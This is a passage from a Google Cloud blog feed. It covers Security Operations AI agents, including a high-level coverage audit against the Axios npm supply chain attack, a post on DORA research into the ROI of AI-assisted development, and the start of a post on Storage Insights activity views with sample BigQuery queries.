&lt;div class="block-paragraph"&gt;&lt;p&gt;To automatically find and fill coverage gaps tailored to your environment, the agent proactively builds new rules and validates them with synthetic events to help ensure your environment is covered before an exploit hits.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;2. Autonomous investigation, containment, and response&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;If a threat is detected, you need to immediately and autonomously assess and respond to protect your environment. By bringing together visibility from cloud and enterprise assets, including endpoints, on-premises firewall, identity, network, and custom application logs, your security operations center (SOC) can gain the full context of an attack, and unify disparate signals into a complete, actionable narrative the moment an adversary strikes.&lt;/p&gt;&lt;p&gt;The &lt;b&gt;Triage and Investigation agent&lt;/b&gt; in Google Security Operations, generally available, helps analysts drastically reduce time to respond by autonomously investigating alerts, gathering evidence for analysis, and providing verdicts with comprehensive explanations. It can help security analysts automate decision-making, alert closure, and remediation flows, allowing them to spend more time prioritizing high-priority threats instead of false positives.&lt;/p&gt;&lt;p&gt;The agent has already investigated over 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.&lt;/p&gt;&lt;p&gt;While identifying threats is critical, the ultimate goal is rapid remediation. &lt;a href="https://cloud.google.com/blog/products/identity-security/rsac-26-supercharging-agentic-ai-defense-with-frontline-threat-intelligence"&gt;&lt;b&gt;Agentic automation&lt;/b&gt;&lt;/a&gt;, available in preview, can help contain attacks by combining dynamic AI agents — which autonomously gather evidence and reason through complex alerts — with deterministic enterprise playbooks.&lt;/p&gt;&lt;p&gt;This hybrid approach ensures that analysts remain in absolute control of critical, high-impact actions while using AI to safely automate decision-making and remediation workflows.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;3. Retroactive hunting&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Even with autonomous detections and rapid-response handling of active threats, stealthy adversaries and zero-day exploits can sometimes bypass frontline controls. To achieve operational resilience, security teams must also look backward through their data to uncover hidden compromises.&lt;/p&gt;&lt;p&gt;Strong, effective defensive strategies rely on more than just reacting to alerts. The &lt;b&gt;Threat Hunting agent&lt;/b&gt;, available in preview, can help teams proactively hunt for novel attack patterns and stealthy adversary behaviors that bypass traditional defenses.&lt;/p&gt;&lt;p&gt;By scouring petabytes of enterprise telemetry (including historical logs) for subtle anomalies the agent fundamentally shifts the SOC posture from reactive to deeply proactive.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Auditing the Axios supply chain attack&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;When adversaries can generate unique exploits and command-and-control (C2) infrastructure at zero marginal cost, static indicators like hashes and IPs decay instantly. Defenders must instead detect the behavioral tactics, techniques, and procedures (TTPs) of the attack.&lt;/p&gt;&lt;p&gt;We had the Detection Engineering agent audit our coverage against the recent &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"&gt;Axios supply chain attack&lt;/a&gt; (UNC1069). The agent mapped the campaign intelligence into behavioral threat detection opportunities (TDOs), simulated the attack chain using high-fidelity synthetic UDM logs, and ran them against active rules.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Google Detection Engineering agent output" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Google_Detection_Engineering_agent_output.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Google Detection Engineering agent output.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;We successfully flagged the execution phases in the middle (renamed PowerShell and macOS background shells), but were blind at the initial entry point (NPM postinstall dropper) and the final C2 exit point.&lt;/p&gt;&lt;p&gt;By exposing these blind spots, the agent helped us proactively engineer custom YARA-L rules to close the loop at the first and final steps of the kill chain. You can sign up for the Google Security Operations &lt;a href="https://docs.google.com/forms/d/14pJvNEZvCtk8NkTiA0QFKCQ0_QfQ-3FJn6ndPBsi_K4/edit?chromeless=1" target="_blank"&gt;Detection Engineering agent preview today&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Next steps&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;By integrating Google Security Operations Gemini-native specialized agents into your workflow, you can autonomously generate detections, orchestrate containment, and hunt for stealthy threats at machine speed. This allows you to maintain a resilient defense even when primary controls fail, ultimately driving a 70% reduction in both breach risks and costs.&lt;/p&gt;&lt;p&gt;Google AI Threat Defense working alongside Google Security Operations can help you consistently outpace automated adversaries. To learn more about how Google AI Threat Defense and Google Security Operations can help you fight AI with AI, check out our &lt;a href="https://cloudonair.withgoogle.com/events/google-cloud-security-talks-june-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-GLOBAL-STO55-onlineevent-er-dgcsm-JuneSecTl-172732&amp;amp;utm_content=blog&amp;amp;utm_term=-" target="_blank"&gt;Security Talks online event on June 10&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</id>
    <title>How to unlock true ROI in software development – a deep dive into the latest DORA research</title>
    <updated>2026-06-09T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;How do you prove the business value of generative AI to your teams? &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Technology and finance leaders need to show the clear business value of AI projects to secure ongoing funding. While measuring return on investment (ROI) is a key part of validating your technical strategy, long-term success ultimately depends on building the organizational systems and culture needed to make AI work.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you evaluate the costs and business benefits of AI, we recently shared the DORA: &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ROI of AI-assisted software development report&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are the key findings from the report, and how you can use them to support your overall technology strategy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #1: Navigating the J-curve of AI value realization&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is important to be realistic about how quickly you will see a return on your AI investments. While AI can act as a powerful amplifier for software engineering, the path to financial value is rarely a straight line. Most organizations will instead encounter a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;J-curve&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: a temporary productivity dip and period of instability associated with early adoption.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This temporary drop is a normal part of adopting new technology, rather than a sign of a failing strategy. The report points to three main reasons why this happens: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The learning curve:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams require dedicated time away from regular feature delivery to adapt their daily workflows and master advanced techniques, evolving from simple prompting to building systems based on context and intent.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The verification tax:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because AI dramatically increases the sheer volume of code produced, developers must invest extra time rigorously reviewing generated outputs to ensure trustworthiness, prevent hallucinations, and meet internal architectural standards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pipeline adaptation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As individual developers generate code significantly faster, downstream processes like testing and change approvals often become bottlenecks and must be actively scaled to handle the increased throughput.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Budgeting for this initial learning phase is key to making the transition work. By anticipating this temporary drop in productivity, you can confidently keep your AI projects moving forward, knowing that these early challenges are an investment in your team's long-term speed.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_M6uB5gM.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The J-Curve of AI value realization&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #2: Understand the market divide on AI returns&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://dora.dev/dora-report-2025/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DORA’s state of AI-assisted software development report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows that 90% of DORA survey respondents report using AI at work. Despite nearly universal adoption, actual financial impacts vary across organizations. Across the market, some companies see clear value from their engineering investments, while others struggle with unexpected costs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When a project falls short, it’s often because the team lacks the organizational support to make it work. To get the returns you expect, you need to prepare your workflows and teams to adopt the new technology. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #3: Calculating your AI ROI is essential&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building a realistic financial model for AI starts with looking at where it actually adds value. Across the software development lifecycle, AI can help your team reduce costs, boost productivity, improve security, and deliver a better experience for both developers and users.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist in modeling this for your organization, you can use this &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;interactive ROI calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This tool helps you explicitly forecast both the visible expenses and the hidden realities of AI adoption.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can explore the mechanics, adjust the assumptions to match your reality, and build your own estimate.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_Iv3XZeI.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The value model—from adoption to ROI&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Download the full report&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Explore the complete framework to quantify your AI investments, navigate the J-Curve, and map your AI investment roadmap.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Try out the interactive ROI calculator&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Visit &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://dora.dev/ai/roi/calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to estimate your organization's potential returns and build a defensible business case.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch this Cloud OnAir webinar: &lt;/span&gt;&lt;a href="https://cloudonair.withgoogle.com/events/from-cost-center-to-value-engine" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;From cost center to value engine: Building your business case for AI-assisted development&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</id>
    <title>Storage Insights datasets: Enabling org-wide operational discovery with activity insights</title>
    <updated>2026-06-09T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprise storage footprints scale to billions of objects, AI applications and agentic workloads are fundamentally shifting the role of storage from a passive repository to the foundation of the data platform. This is driven by a surge in unstructured model data and the billions of actions performed on those objects, including session logs and audit trails. To manage this and answer questions about cost, operations, and security, storage and platform admins need to go beyond knowing what data they have, to understanding exactly how it is being accessed, moved, and modified. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help, we're excited to announce activity insights within &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Now generally available, these new views provide visibility into the operational details of your Google Cloud Storage assets, enabling data-driven cost optimization and faster troubleshooting. For example, with activity insights, you can answer questions like:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Are my objects located in the right storage classes within my buckets?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What regions is my bucket interacting with the most so I can assess if it is optimally located?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Where are there errors across operations on my storage estate and why?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Answering these questions confidently is the key to unlocking cost optimizations and reclaiming engineering time. Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, a feature of &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Cloud Storage&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, provides daily metadata and frequent activity insights (typically within four hours of the activity) so you have better visibility into your storage estate. While Storage Intelligence is a unified management product with capabilities like &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/bucket-relocation/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Bucket relocation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/batch-operations/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Batch operations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/analyze-data-gemini-cloud-assist"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Cloud Assist&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this blog focuses on how you can leverage Storage Insights datasets for operational optimization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What are Storage Insights datasets?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; deliver an automated, query-ready BigQuery index of your entire storage estate, complete with raw metadata and activity insights, replacing manual, error-prone data collection. Storage Insights datasets can be customized in scope: create a dataset for your entire org, a specific folder, a project, or a set of projects, or even specific buckets. The dataset then refreshes with regular updates, giving you a comprehensive view of your storage.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From static metadata to live intelligence&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets are your go-to tool for understanding your storage &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;metadata&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, acting as an inventory management tool, scanning object metadata (storage class, location, age, custom metadata) and organizing it into a powerful, queryable BigQuery-linked dataset. This is crucial for knowing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;what&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; data you have (learn more about how to optimize storage spend with Storage Insights datasets &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But what if you also knew &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;how and when&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that data is being used?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets now offers a set of new views that capture: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Object-level activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including writes, updates, deletes, and errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations, total errors and most active prefixes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level regional traffic activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including ingress and egress bytes per region that interact with your bucket&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Project-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations and total errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This data flows directly into new BigQuery views within your dataset so you can run analytics queries for specific insights, interact with the data via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/gemini-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or simply connect it to powerful &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker dashboards&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for visualization. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This moves you from a static snapshot to a dynamic, queryable analysis of your data's entire lifecycle. It's the difference between knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what's&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in your warehouse and knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what’s used &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;when&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Three ways to use activity insights immediately&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s what you can do, starting today, with activity insights in Storage Intelligence datasets.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Right-size your storage estate&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You have terabytes of data in Standard or Nearline class storage that you &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;believe&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is cold. But without proof, moving it to Coldline or Archive class is risky. What if a critical process still needs to read it once per quarter?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With the new Storage Intelligence views that surface activity insights, you can now identify buckets that have had minimal read/write activity over the last 30, 60, or 90 days.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Apply or fine-tune lifecycle policies to transition this data to more cost-effective storage classes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to order all the buckets in your estate with little to no activity in the last six months:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT name, location, project, totalRequests\r\nFROM\r\n  `[project]`.`[dataset]`.`bucket_activity_view`\r\nWHERE\r\n  snapshotEndTime &amp;gt;= TIMESTAMP(DATE_SUB(DATE_TRUNC(CURRENT_DATE(), MONTH), INTERVAL 5 MONTH))\r\n  AND snapshotEndTime &amp;lt; CURRENT_TIMESTAMP()\r\nORDER BY totalRequests ASC\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f137999b3a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Architect for global performance with data-driven bucket placement&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team set up a multi-region bucket to serve a global application. But a year later, is that still the right architecture? What if 99% of your traffic is now coming from a single region?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze the access patterns in your new bucket_region_activity_view table. You can easily pinpoint which regions are driving read and write activity for the bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Make data-driven decisions to co-locate your bucket with your compute. You might find that changing a multi-region bucket to a single-region one (or vice-versa) can lead to significant cost-savings and even improve performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to break down the egress and ingress traffic pattern for a bucket across regions: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  requestLocation,\r\n  bucketLocation,\r\n  SUM(requestBytes) AS total_request_bytes,\r\n  SUM(responseBytes) AS total_response_bytes\r\nFROM\r\n  `[project]`.`[dataset]`.`bucket_region_activity_view` \r\nWHERE\r\n  name = &amp;#x27;[bucket name]&amp;#x27;\r\nGROUP BY\r\n  requestLocation,\r\n  bucketLocation;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f137999b850&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shipt&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a retail technology platform and same-day delivery service, has been using Storage Intelligence capabilities to inform their data location decisions: &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Storage Intelligence enables us to efficiently manage over 2 billion objects, delivering cost and performance optimization. With Insights datasets, we detected and analyzed egress charges from multi-region buckets, identifying opportunities to improve efficiency by co-locating compute and storage. By leveraging the Bucket Relocate capability, we seamlessly moved 1.3 Petabytes of data from multi-region to regional storage, achieving substantial cost savings while maintaining uninterrupted application performance and data pipeline continuity.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;-&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Ron Cuirle, Director of Engineering - Cloud Platforms, Shipt&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Demystify and resolve operational hotspots &lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
